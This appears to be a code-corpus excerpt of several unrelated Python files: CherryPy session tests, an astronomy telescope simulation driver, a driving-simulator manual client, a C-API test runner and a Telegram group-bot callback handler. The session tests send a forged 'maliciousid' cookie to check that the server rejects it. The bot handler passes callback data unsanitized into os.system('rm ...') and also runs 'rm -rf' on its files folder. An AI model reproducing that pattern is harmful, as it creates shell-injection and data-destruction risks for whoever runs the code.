testGen.exposed = True
def testStr(self):
counter = cherrypy.session.get('counter', 0) + 1
cherrypy.session['counter'] = counter
return str(counter)
testStr.exposed = True
def setsessiontype(self, newtype):
self.__class__._cp_config.update({'tools.sessions.storage_type': newtype})
if hasattr(cherrypy, "session"):
del cherrypy.session
cls = getattr(sessions, newtype.title() + 'Session')
if cls.clean_thread:
cls.clean_thread.stop()
cls.clean_thread.unsubscribe()
del cls.clean_thread
setsessiontype.exposed = True
setsessiontype._cp_config = {'tools.sessions.on': False}
def index(self):
sess = cherrypy.session
c = sess.get('counter', 0) + 1
time.sleep(0.01)
sess['counter'] = c
return str(c)
index.exposed = True
def keyin(self, key):
return str(key in cherrypy.session)
keyin.exposed = True
def delete(self):
cherrypy.session.delete()
sessions.expire()
return "done"
delete.exposed = True
def delkey(self, key):
del cherrypy.session[key]
return "OK"
delkey.exposed = True
def blah(self):
return self._cp_config['tools.sessions.storage_type']
blah.exposed = True
def iredir(self):
raise cherrypy.InternalRedirect('/blah')
iredir.exposed = True
def restricted(self):
return cherrypy.request.method
restricted.exposed = True
restricted._cp_config = {'tools.allow.on': True,
'tools.allow.methods': ['GET']}
def regen(self):
cherrypy.tools.sessions.regenerate()
return "logged in"
regen.exposed = True
def length(self):
return str(len(cherrypy.session))
length.exposed = True
def session_cookie(self):
# Must load() to start the clean thread.
cherrypy.session.load()
return cherrypy.session.id
session_cookie.exposed = True
session_cookie._cp_config = {
'tools.sessions.path': '/session_cookie',
'tools.sessions.name': 'temp',
'tools.sessions.persistent': False}
cherrypy.tree.mount(Root())
from cherrypy.test import helper
class SessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def tearDown(self):
# Clean up sessions.
for fname in os.listdir(localDir):
if fname.startswith(sessions.FileSession.SESSION_PREFIX):
os.unlink(os.path.join(localDir, fname))
def test_0_Session(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
# Test that a normal request gets the same id in the cookies.
# Note: this wouldn't work if /data didn't load the session.
self.getPage('/data')
self.assertBody("{'aha': 'foo'}")
c = self.cookies[0]
self.getPage('/data', self.cookies)
self.assertEqual(self.cookies[0], c)
self.getPage('/testStr')
self.assertBody('1')
cookie_parts = dict([p.strip().split('=')
for p in self.cookies[0][1].split(";")])
# Assert there is an 'expires' param
self.assertEqual(set(cookie_parts.keys()),
set(['session_id', 'expires', 'Path']))
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/data', self.cookies)
self.assertBody("{'aha': 'foo', 'counter': 3}")
self.getPage('/length', self.cookies)
self.assertBody('2')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
self.getPage('/setsessiontype/file')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(2)
self.getPage('/')
self.assertBody('1')
self.getPage('/length', self.cookies)
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
cookieset1 = self.cookies
# Make a new session and test __len__ again
self.getPage('/')
self.getPage('/length', self.cookies)
self.assertBody('2')
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
self.getPage('/delete', cookieset1)
self.assertBody("done")
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertEqual(f(), [])
# Wait for the cleanup thread to delete remaining session files
self.getPage('/')
f = lambda: [x for x in os.listdir(localDir) if x.startswith('session-')]
self.assertNotEqual(f(), [])
time.sleep(2)
self.assertEqual(f(), [])
def test_1_Ram_Concurrency(self):
self.getPage('/setsessiontype/ram')
self._test_Concurrency()
def test_2_File_Concurrency(self):
self.getPage('/setsessiontype/file')
self._test_Concurrency()
def _test_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
errors = []
def request(index):
if self.scheme == 'https':
c = HTTPSConnection('%s:%s' % (self.interface(), self.PORT))
else:
c = HTTPConnection('%s:%s' % (self.interface(), self.PORT))
for i in range(request_count):
c.putrequest('GET', '/')
for k, v in cookies:
c.putheader(k, v)
c.endheaders()
response = c.getresponse()
body = response.read()
if response.status != 200 or not body.isdigit():
errors.append((response.status, body))
else:
data_dict[index] = max(data_dict[index], int(body))
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
# Start <request_count> requests from each of
# <client_thread_count> concurrent clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
for e in errors:
print(e)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("file")
def test_4_File_deletion(self):
# Start a new session
self.getPage('/testStr')
# Delete the session file manually and retry.
id = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
path = os.path.join(localDir, "session-" + id)
os.unlink(path)
self.getPage('/testStr', self.cookies)
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
def test_6_regenerate(self):
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/regen')
self.assertBody('logged in')
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.getPage('/testStr')
# grab the cookie ID
id1 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.getPage('/testStr',
headers=[('Cookie',
'session_id=maliciousid; '
'expires=Sat, 27 Oct 2017 04:18:28 GMT; Path=/;')])
id2 = self.cookies[0][1].split(";", 1)[0].split("=", 1)[1]
self.assertNotEqual(id1, id2)
self.assertNotEqual(id2, 'maliciousid')
def test_7_session_cookies(self):
self.getPage('/setsessiontype/ram')
self.getPage('/clear')
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
id1 = cookie_parts['temp']
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Send another request in the same "browser session".
self.getPage('/session_cookie', self.cookies)
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
self.assertBody(id1)
self.assertEqual(copykeys(sessions.RamSession.cache), [id1])
# Simulate a browser close by just not sending the cookies
self.getPage('/session_cookie')
# grab the cookie ID
cookie_parts = dict([p.strip().split('=') for p in self.cookies[0][1].split(";")])
# Assert there is no 'expires' param
self.assertEqual(set(cookie_parts.keys()), set(['temp', 'Path']))
# Assert a new id has been generated...
id2 = cookie_parts['temp']
self.assertNotEqual(id1, id2)
self.assertEqual(set(sessions.RamSession.cache.keys()), set([id1, id2]))
# Wait for the session.timeout on both sessions
time.sleep(2.5)
cache = copykeys(sessions.RamSession.cache)
if cache:
if cache == [id2]:
self.fail("The second session did not time out.")
else:
self.fail("Unknown session id in cache: %r", cache)
import socket
try:
import memcache
host, port = '127.0.0.1', 11211
for res in socket.getaddrinfo(host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
s = None
try:
s = socket.socket(af, socktype, proto)
# See http://groups.google.com/group/cherrypy-users/
# browse_frm/thread/bbfe5eb39c904fe0
s.settimeout(1.0)
s.connect((host, port))
s.close()
except socket.error:
if s:
s.close()
raise
break
except (ImportError, socket.error):
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test(self):
return self.skip("memcached not reachable ")
else:
class MemcachedSessionTest(helper.CPWebCase):
setup_server = staticmethod(setup_server)
def test_0_Session(self):
self.getPage('/setsessiontype/memcached')
self.getPage('/testStr')
self.assertBody('1')
self.getPage('/testGen', self.cookies)
self.assertBody('2')
self.getPage('/testStr', self.cookies)
self.assertBody('3')
self.getPage('/length', self.cookies)
self.assertErrorPage(500)
self.assertInBody("NotImplementedError")
self.getPage('/delkey?key=counter', self.cookies)
self.assertStatus(200)
# Wait for the session.timeout (1 second)
time.sleep(1.25)
self.getPage('/')
self.assertBody('1')
# Test session __contains__
self.getPage('/keyin?key=counter', self.cookies)
self.assertBody("True")
# Test session delete
self.getPage('/delete', self.cookies)
self.assertBody("done")
def test_1_Concurrency(self):
client_thread_count = 5
request_count = 30
# Get initial cookie
self.getPage("/")
self.assertBody("1")
cookies = self.cookies
data_dict = {}
def request(index):
for i in range(request_count):
self.getPage("/", cookies)
# Uncomment the following line to prove threads overlap.
## sys.stdout.write("%d " % index)
if not self.body.isdigit():
self.fail(self.body)
data_dict[index] = v = int(self.body)
# Start <request_count> concurrent requests from
# each of <client_thread_count> clients
ts = []
for c in range(client_thread_count):
data_dict[c] = 0
t = threading.Thread(target=request, args=(c,))
ts.append(t)
t.start()
for t in ts:
t.join()
hitcount = max(data_dict.values())
expected = 1 + (client_thread_count * request_count)
self.assertEqual(hitcount, expected)
def test_3_Redirect(self):
# Start a new session
self.getPage('/testStr')
self.getPage('/iredir', self.cookies)
self.assertBody("memcached")
def test_5_Error_paths(self):
self.getPage('/unknown/page')
self.assertErrorPage(404, "The path '/unknown/page' was not found.")
# Note: this path is *not* the same as above. The above
# takes a normal route through the session code; this one
# skips the session code's before_handler and only calls
# before_finalize (save) and on_end (close). So the session
# code has to survive calling save/close without init.
self.getPage('/restricted', self.cookies, method='POST')
self.assertErrorPage(405, response_codes[405][1])
|
get_photon_data.py
|
"""Top level code that takes a atmosphere phase map and propagates a wavefront through the system"""
import os
import numpy as np
import traceback
import multiprocessing
import glob
import random
import pickle as pickle
import time
from proper_mod import prop_run
from medis.Utils.plot_tools import quicklook_im, view_datacube, loop_frames
from medis.Utils.misc import dprint
from medis.params import ap,cp,tp,mp,sp,iop,dp
import medis.Detector.MKIDs as MKIDs
import medis.Detector.H2RG as H2RG
import medis.Detector.pipeline as pipe
import medis.Detector.readout as read
import medis.Telescope.aberrations as aber
import medis.Atmosphere.atmos as atmos
sentinel = None
def gen_timeseries(inqueue, photon_table_queue, outqueue, conf_obj_tup):
"""
generates observation sequence by calling optics_propagate in time series
is the time loop wrapper for optics_propagate
this is where the observation sequence is generated (timeseries of observations by the detector)
thus, where the detector observes the wavefront created by optics_propagate (for MKIDs, the probability distribution)
:param inqueue: time index for parallelization (used by multiprocess)
:param photon_table_queue: photon table (list of photon packets) in the multiprocessing format
:param spectralcube_queue: series of intensity images (spectral image cube) in the multiprocessing format
:param xxx_todo_changeme:
:return:
"""
# TODO change this name
(tp,ap,sp,iop,cp,mp) = conf_obj_tup
try:
if tp.detector == 'MKIDs':
with open(iop.device_params, 'rb') as handle:
dp = pickle.load(handle)
start = time.time()
for it, t in enumerate(iter(inqueue.get, sentinel)):
kwargs = {'iter': t, 'params': [ap, tp, iop, sp]}
_, save_E_fields = prop_run('medis.Telescope.optics_propagate', 1, ap.grid_size, PASSVALUE=kwargs,
VERBOSE=False, PHASE_OFFSET=1)
print(save_E_fields.shape)
spectralcube = np.sum(np.abs(save_E_fields[-1, :, :]) ** 2, axis=1)
if tp.detector == 'ideal':
image = np.sum(spectralcube, axis=0)
vmin = np.min(spectralcube)*10
# cube = ideal.assign_calibtime(spectralcube,PASSVALUE['iter'])
# cube = rawImageIO.arange_into_cube(packets, value='phase')
# rawImageIO.make_phase_map(cube, plot=True)
# return ''
elif tp.detector == 'MKIDs':
packets = read.get_packets(spectralcube, t, dp, mp)
# packets = read.get_packets(save_E_fields, t, dp, mp)
# if sp.show_wframe or sp.show_cube or sp.return_spectralcube:
cube = pipe.arange_into_cube(packets, (mp.array_size[0], mp.array_size[1]))
if mp.remove_close:
timecube = read.remove_close_photons(cube)
if sp.show_wframe:
image = pipe.make_intensity_map(cube, (mp.array_size[0], mp.array_size[1]))
# Interpolating spectral cube from ap.nwsamp discreet wavelengths
# if sp.show_cube or sp.return_spectralcube:
spectralcube = pipe.make_datacube(cube, (mp.array_size[0], mp.array_size[1], ap.w_bins))
if sp.save_obs:
command = read.get_obs_command(packets,t)
photon_table_queue.put(command)
vmin = 0.9
if sp.show_wframe:
dprint((sp.show_wframe, sp.show_wframe == 'continuous'))
quicklook_im(image, logAmp=True, show=sp.show_wframe, vmin=vmin)
if sp.show_cube:
view_datacube(spectralcube, logAmp=True, vmin=vmin)
if sp.use_gui:
gui_images = np.zeros_like(save_E_fields, dtype=np.float)
phase_ind = sp.gui_map_type == 'phase'
amp_ind = sp.gui_map_type == 'amp'
gui_images[phase_ind] = np.angle(save_E_fields[phase_ind], deg=False)
gui_images[amp_ind] = np.absolute(save_E_fields[amp_ind])
outqueue.put((t, gui_images, spectralcube))
elif sp.return_E:
outqueue.put((t, save_E_fields))
else:
outqueue.put((t, spectralcube))
now = time.time()
elapsed = float(now - start) / 60.
each_iter = float(elapsed) / (it + 1)
print('***********************************')
dprint(f'{elapsed:.2f} minutes elapsed, each time step took {each_iter:.2f} minutes') #* ap.numframes/sp.num_processes TODO change to log #
except Exception as e:
traceback.print_exc()
# raise e
pass
def wait_until(somepredicate, timeout, period=0.25, *args, **kwargs):
mustend = time.time() + timeout
while time.time() < mustend:
if somepredicate(*args, **kwargs): return True
time.sleep(period)
return False
def run_medis(EfieldsThread=None, plot=False):
"""
main script to organize calls to various aspects of the simulation
initialize different sub-processes, such as atmosphere and aberration maps, MKID device parameters
sets up the multiprocessing features
returns the observation sequence created by gen_timeseries
:return: obs_sequence
"""
# Printing Params
dprint("Checking Params Info-print params from here (turn on/off)")
# TODO change this to a logging function
# for param in [ap, cp, tp, mp, sp, iop]:
# print('\n', param)
# pprint(param.__dict__)
iop.makedir() # make the directories at this point in case the user doesn't want to keep changing params.py
check = read.check_exists_obs_sequence(plot)
if check:
if iop.obs_seq[-3:] == '.h5':
obs_sequence = read.open_obs_sequence_hdf5(iop.obs_seq)
else:
obs_sequence = read.open_obs_sequence(iop.obs_seq)
return obs_sequence
begin = time.time()
print('Creating New MEDIS Simulation')
print('********** Taking Obs Data ***********')
try:
multiprocessing.set_start_method('spawn')
except RuntimeError:
pass
# initialize atmosphere
print("Atmosdir = %s " % iop.atmosdir)
if tp.use_atmos and glob.glob(iop.atmosdir + '/*.fits') == []:
atmos.generate_maps()
# initialize telescope
if (tp.aber_params['QuasiStatic'] is True) and glob.glob(iop.aberdir + 'quasi/*.fits') == []:
aber.generate_maps(tp.f_lens)
if tp.aber_params['NCPA']:
aber.generate_maps(tp.f_lens, 'NCPA', 'lens')
# if tp.servo_error:
# aber.createObjMapsEmpty()
aber.initialize_CPA_meas()
if tp.active_null:
aber.initialize_NCPA_meas()
if sp.save_locs is None:
sp.save_locs = []
if 'detector' not in sp.save_locs:
sp.save_locs = np.append(sp.save_locs, 'detector')
sp.gui_map_type = np.append(sp.gui_map_type, 'amp')
# initialize MKIDs
if tp.detector == 'MKIDs' and not os.path.isfile(iop.device_params):
MKIDs.initialize()
photon_table_queue = multiprocessing.Queue()
inqueue = multiprocessing.Queue()
outqueue = multiprocessing.Queue()
jobs = []
if sp.save_obs and tp.detector == 'MKIDs':
proc = multiprocessing.Process(target=read.handle_output, args=(photon_table_queue, iop.obsfile))
proc.start()
if ap.companion is False:
ap.contrast = []
if tp.detector == 'MKIDs':
obs_sequence = np.zeros((ap.numframes, ap.w_bins, mp.array_size[1], mp.array_size[0]))
else:
obs_sequence = np.zeros((ap.numframes, ap.w_bins, ap.grid_size, ap.grid_size))
if sp.return_E:
e_fields_sequence = np.zeros((ap.numframes, len(sp.save_locs),
ap.nwsamp, 1 + len(ap.contrast),
ap.grid_size, ap.grid_size), dtype=np.complex64)
else:
e_fields_sequence = None
# Sending Queues to gen_timeseries
for i in range(sp.num_processes):
p = multiprocessing.Process(target=gen_timeseries, args=(inqueue, photon_table_queue, outqueue, (tp,ap,sp,iop,cp,mp)))
jobs.append(p)
p.start()
if tp.quick_ao:
for t in range(ap.startframe, ap.startframe + ap.numframes):
inqueue.put(t)
if sp.use_gui:
it, gui_images, spectralcube = outqueue.get()
while sp.play_gui is False:
time.sleep(0.005)
EfieldsThread.newSample.emit(gui_images)
EfieldsThread.sct.newSample.emit((it, spectralcube))
else:
dprint('If the code has hung here it probably means it cant read the CPA file at some iter')
for t in range(ap.startframe, ap.startframe+ap.numframes):
# time.sleep(rollout[t])
print(t)
if not tp.active_null:
with open(iop.CPA_meas, 'rb') as handle:
_, iters = pickle.load(handle)
# print t, iter, 't, iter'
print(iters, 'iters')
while iters[0] + ap.startframe < t:
time.sleep(0.1)
print('looping', t)
try:
with open(iop.CPA_meas, 'rb') as handle:
_, iters = pickle.load(handle)
iter = iters[0]
# sys.stdout.write("\rWaiting for aberration measurements...\n")
# sys.stdout.flush()
except EOFError:
print('Errored')
else:
with open(iop.NCPA_meas, 'rb') as handle:
_,_, iter = pickle.load(handle)
while iter < t:
time.sleep(0.1)
try:
with open(iop.NCPA_meas, 'rb') as handle:
_,_, iter = pickle.load(handle)
# sys.stdout.write("\rWaiting for aberration measurements...\n")
# sys.stdout.flush()
except EOFError:
print('Errored')
# if t in delay_inds:
# with open(iop.NCPA_meas, 'rb') as handle:
# _, _, iter = pickle.load(handle)
# print iter, t
# while iter != t:
# with open(iop.NCPA_meas, 'rb') as handle:
# _, _, iter = pickle.load(handle)
# # wait_until()
inqueue.put(t)
for i in range(sp.num_processes):
# Send the sentinal to tell Simulation to end
inqueue.put(sentinel)
for t in range(ap.numframes):
if sp.return_E:
t, save_E_fields = outqueue.get()
e_fields_sequence[t - ap.startframe] = save_E_fields
else:
t, spectralcube = outqueue.get()
obs_sequence[t - ap.startframe] = spectralcube # should be in the right order now because of the identifier
# for i, p in enumerate(jobs):
# p.join()
photon_table_queue.put(None)
outqueue.put(None)
if sp.save_obs and tp.detector == 'MKIDs':
proc.join()
obs_sequence = np.array(obs_sequence)
print('MEDIS Data Run Completed')
finish = time.time()
if sp.timing is True:
print(f'Time elapsed: {(finish-begin)/60:.2f} minutes')
print('**************************************')
print(f"Shape of obs_sequence = {np.shape(obs_sequence)}")
if tp.detector == 'H2RG':
obs_sequence = H2RG.scale_to_luminos(obs_sequence)
if tp.detector == 'H2RG' and hp.use_readnoise:
obs_sequence = H2RG.add_readnoise(obs_sequence, hp.readnoise)
if sp.return_E:
read.save_fields(e_fields_sequence, fields_file=iop.fields)
return e_fields_sequence
else:
dprint("Saving obs_sequence as hdf5 file:")
read.save_obs_sequence(obs_sequence, obs_seq_file=iop.obs_seq)
return obs_sequence
if __name__ == '__main__':
sp.timing = True
run_medis()
|
manual_ai.py
|
from threading import Thread
from typing import List
from pathlib import Path
from drivebuildclient.aiExchangeMessages_pb2 import SimulationID
def _handle_vehicle(sid: SimulationID, vid: str, requests: List[str]) -> None:
vid_obj = VehicleID()
vid_obj.vid = vid
while True:
print(sid.sid + ": Test status: " + service.get_status(sid))
print(vid + ": Wait")
sim_state = service.wait_for_simulator_request(sid, vid_obj) # wait()
if sim_state is SimStateResponse.SimState.RUNNING:
print(vid + ": Request data")
request = DataRequest()
request.request_ids.extend(requests)
data = service.request_data(sid, vid_obj, request) # request()
# print(data)
print(vid + ": Wait for control")
control = Control()
while not is_pressed("space"): # Wait for the user to trigger manual drive
pass
print(vid + ": Control")
if is_pressed("s"):
control.simCommand.command = Control.SimCommand.Command.SUCCEED
elif is_pressed("f"):
control.simCommand.command = Control.SimCommand.Command.FAIL
elif is_pressed("c"):
control.simCommand.command = Control.SimCommand.Command.CANCEL
else:
accelerate = 0
steer = 0
brake = 0
if is_pressed("up"):
accelerate = 1
if is_pressed("down"):
brake = 1
if is_pressed("right"):
steer = steer + 1
if is_pressed("left"):
steer = steer - 1
control.avCommand.accelerate = accelerate
control.avCommand.steer = steer
control.avCommand.brake = brake
service.control(sid, vid_obj, control) # control()
else:
print(sid.sid + ": The simulation is not running anymore (State: "
+ SimStateResponse.SimState.Name(sim_state) + ").")
print(sid.sid + ": Final result: " + service.get_result(sid))
break
if __name__ == "__main__":
from drivebuildclient.AIExchangeService import AIExchangeService
from drivebuildclient.aiExchangeMessages_pb2 import SimStateResponse, Control, SimulationID, VehicleID, DataRequest
from keyboard import is_pressed
service = AIExchangeService("localhost", 8383)
# Send tests
submission_result = service.run_tests("test", "test", Path("criteriaA.dbc.xml"), Path("environmentA.dbe.xml"))
# Interact with a simulation
if submission_result and submission_result.submissions:
for test_name, sid in submission_result.submissions.items():
ego_requests = ["egoPosition", "egoSpeed", "egoSteeringAngle", "egoFrontCamera", "egoLidar", "egoLaneDist"]
non_ego_requests = ["nonEgoPosition", "nonEgoSpeed", "nonEgoSteeringAngle", "nonEgoLeftCamera", "nonEgoLidar",
"nonEgoLaneDist"]
ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "ego", ego_requests))
ego_vehicle.start()
non_ego_vehicle = Thread(target=_handle_vehicle, args=(sid, "nonEgo", non_ego_requests))
non_ego_vehicle.start()
ego_vehicle.join()
non_ego_vehicle.join()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import sys
from test import test_support
import _testcapi
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
if test_support.verbose:
print "internal", name
try:
test()
except _testcapi.error:
raise test_support.TestFailed, sys.exc_info()[1]
# some extra thread-state tests driven via _testcapi
def TestThreadState():
import thread
import time
if test_support.verbose:
print "auto-thread-state"
idents = []
def callback():
idents.append(thread.get_ident())
_testcapi._test_thread_state(callback)
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
if idents.count(thread.get_ident()) != 3:
raise test_support.TestFailed, \
"Couldn't find main thread correctly in the list"
try:
_testcapi._test_thread_state
have_thread_state = True
except AttributeError:
have_thread_state = False
if have_thread_state:
TestThreadState()
import threading
t=threading.Thread(target=TestThreadState)
t.start()
|
callback.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo,GPranks,IDrank
from utlis.send import send_msg, BYusers, Sendto, fwdto,Name,Glang,getAge
from utlis.locks import st,getOR,Clang,st_res
from utlis.tg import Bot
from config import *
from pyrogram.types import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json,datetime,os
import importlib
from os import listdir
from os.path import isfile, join
def updateCallback(client, callback_query,redis):
try:
json.loads(callback_query.data)
except Exception as e:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
if callback_query.inline_message_id:
if redis.smembers("{}Nbot:botfiles".format(BOT_ID)):
onlyfiles = [f for f in listdir("files") if isfile(join("files", f))]
filesR = redis.smembers("{}Nbot:botfiles".format(BOT_ID))
for f in onlyfiles:
if f in filesR:
fi = f.replace(".py","")
UpMs= "files."+fi
try:
U = importlib.import_module(UpMs)
t = threading.Thread(target=U.updateCb,args=(client, callback_query,redis))
t.setDaemon(True)
t.start()
importlib.reload(U)
except Exception as e:
pass
return False
userID = callback_query.from_user.id
chatID = callback_query.message.chat.id
userFN = callback_query.from_user.first_name
title = callback_query.message.chat.title
message_id = callback_query.message.message_id
date = json.loads(callback_query.data)
group = redis.sismember("{}Nbot:groups".format(BOT_ID),chatID)
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
if date[0] == "Cordertow":
rank = isrank(redis,userID,chatID)
if (rank is "sudo" or rank is "asudo" or rank is "sudos" or rank is "malk" or rank is "acreator" or rank is "creator" or rank is "owner"):
if redis.sismember("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1]):
GetGprank = GPranks(date[1],chatID)
if GetGprank == "kicked":
Bot("unbanChatMember",{"chat_id":chatID,"user_id":date[1]})
redis.srem("{}Nbot:{}:bans".format(BOT_ID,chatID),date[1])
Bot("editMessageText",{"chat_id":chatID,"text":r.doneCO,"message_id":message_id,"disable_web_page_preview":True})
else:
Bot("editMessageText",{"chat_id":chatID,"text":r.ARdoneCO,"message_id":message_id,"disable_web_page_preview":True})
return False
if date[0] == "delBL":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chat,Hash))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
if re.search("del(.*)replys$",date[0]):
if int(date[2]) != userID:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.notforyou,"show_alert":True})
return 0
t = date[0].replace("del","")
if date[1] != "kb":
redis.delete("{}Nbot:{}:{}".format(BOT_ID,date[1],t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylist","",userID])),]])
redis.delete("{}Nbot:{}:{}".format(BOT_ID,chatID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if re.search("del(.*)replysBOT",date[0]):
rank = isrank(redis,userID,chatID)
if rank == "sudo":
t = date[0].replace("del","")
t = t.replace("BOT","")
if date[1] != "kb":
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True})
else:
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton("<<",callback_data=json.dumps(["replylistBOT","",userID])),]])
redis.delete("{}Nbot:{}".format(BOT_ID,t))
Bot("editMessageText",{"chat_id":chatID,"text":r.DoneDelList,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
else:
Bot("answerCallbackQuery",{"callback_query_id":callback_query.id,"text":r.SudoOnle,"show_alert":True})
if date[0] == "delfromb":
Hash = date[1]
chat = date[3]
if redis.sismember("{}Nbot:groups".format(BOT_ID),chat):
if Hash == "blockanimations":
ID = callback_query.message.animation.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockSTICKERs":
ID = callback_query.message.sticker.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
if Hash == "blockphotos":
ID = callback_query.message.photo.file_id
redis.srem("{}Nbot:{}:{}".format(BOT_ID,chat,Hash),ID)
Bot("deleteMessage",{"chat_id":chatID,"message_id":message_id})
User_click = int((redis.get("{}Nbot:{}:floodClick".format(BOT_ID,userID)) or 1))
if User_click > 10:
BY = "<a href=\"tg://user?id={}\">{}</a>".format(userID,userFN)
Bot("sendMessage",{"chat_id":chatID,"text":r.banclick.format(BY),"disable_web_page_preview":True,"parse_mode":"html"})
redis.setex("{}Nbot:floodUsers:{}".format(BOT_ID,userID),60*2,"Ban")
redis.delete("{}Nbot:{}:floodClick".format(BOT_ID,userID))
if chatID == userID:
group = True
if group is True and int(date[2]) == userID and not redis.get("{}Nbot:floodUsers:{}".format(BOT_ID,userID)):
if date[0] == "delcheck":
reply_markup=InlineKeyboardMarkup([[InlineKeyboardButton(r.notcertain, callback_data=json.dumps(["kickcheck","",userID])),InlineKeyboardButton(r.certain, callback_data=json.dumps(["certain","",userID]))]])
random.shuffle(reply_markup.inline_keyboard[0])
Bot("editMessageText",{"chat_id":chatID,"text":r.ucertain,"message_id":message_id,"disable_web_page_preview":True,"reply_markup":reply_markup})
if date[0] == "certain":
Bot("restrictChatMember",{"chat_id": chatID,"user_id":userID,"can_send_messages": 1,"can_send_media_messages": 1,"can_send_other_messages": 1,"can_send_polls": 1,"can_change_info": 1,"can_add_web_page_previews": 1,"can_pin_messages": 1,})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
Bot("editMessageText",{"chat_id":chatID,"text":r.unrestricted.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html"})
if date[0] == "kickcheck":
Bot("kickChatMember",{"chat_id":chatID,"user_id":userID})
T ="<a href=\"tg://user?id={}\">{}</a>".format(userID,Name(userFN))
crid = redis.get("{}Nbot:{}:creator".format(BOT_ID,chatID))
redis.sadd("{}Nbot:{}:bans".format(BOT_ID,chatID),userID)
reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.Corder, callback_data=json.dumps(["Cordertow",userID]))]])
Bot("editMessageText",{"chat_id":chatID,"text":r.bancheck.format(T),"message_id":message_id,"disable_web_page_preview":True,"parse_mode":"html","reply_markup":reply_markup})
if date[0] == "delF":
File = date[1]
os.system("rm ./files/"+File)
Bot("editMessageText",{"chat_id":chatID,"text":r.Delfile.format(File),"message_id":message_id,"parse_mode":"html","disable_web_page_preview":True})
if date[0] == "delFa":
os.system("rm -rf ./files/*")
